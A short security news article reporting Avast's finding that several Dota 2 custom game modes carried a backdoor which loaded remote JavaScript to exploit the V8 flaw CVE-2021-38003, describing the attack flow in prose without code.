The vulnerability, tracked as CVE-2021-38003, was located in Google’s open source JavaScript engine, known as V8, used in Dota 2. The developers at Google patched it in October 2021, but Valve hasn’t updated the software since. , while maintaining vulnerability. A month ago, researchers at Avast warned him that a critical vulnerability was being targeted.

What happened

A hacker took advantage of Valve’s carelessness by creating a special game mode that exploited the vulnerability. He later created three more of these.

The first game mode appears to be necessary to test the exploitability of the vulnerability. It had embedded exploit code for CVE-2021-38003 that was easy to detect. It was called “test plugin plz ignore” (ID 1556548695) and contained a description encouraging people not to download or install it.

The other three:

• “No annoying heroes” (id 2776998052).
• “Special Hero Fight” (id 2780728794).
• “RTZ Edition X10 Take Over XP” (id 2780559339).

The malicious code in these three new game modes is more “advanced” and does not contain any directly visible JavaScript vulnerabilities. Instead, there is a backdoor of about twenty lines of code. By running optional JavaScript downloaded via HTTP, it not only gives an attacker the ability to hide exploit code, but can update it at any time without having to update the entire custom game mode.

The server that these three mods accessed was already down when Avast researchers discovered the mods. Probably, the developer himself decided to stop using the vulnerability.

How the backdoor worked:

• The victim enters the game by playing in one of the malicious game modes.
• The game loads normally, but in the background malicious JavaScript communicates with the game mode server.
• The game mode server code communicates with the backdoor C&C server, downloads a piece of JavaScript code (probably an exploit for CVE-2021-38003), and returns the downloaded code to the victim.
• The victim dynamically executes the loaded JavaScript. If this were a vulnerability for CVE-2021-38003, it would have led to command code execution on the victim’s computer.

Researchers say it’s impossible to determine exactly what the developer’s intentions are with these mods, but Avast’s announcement says there are two reasons to suspect that these aren’t entirely well-intentioned research.

First, the attacker did not report the vulnerability to Valve (which is generally considered a good thing). Second, the attacker tried to hide the vulnerability in a secret backdoor.
– the researchers explained.

Valve officials did not respond to requests for comment for this story.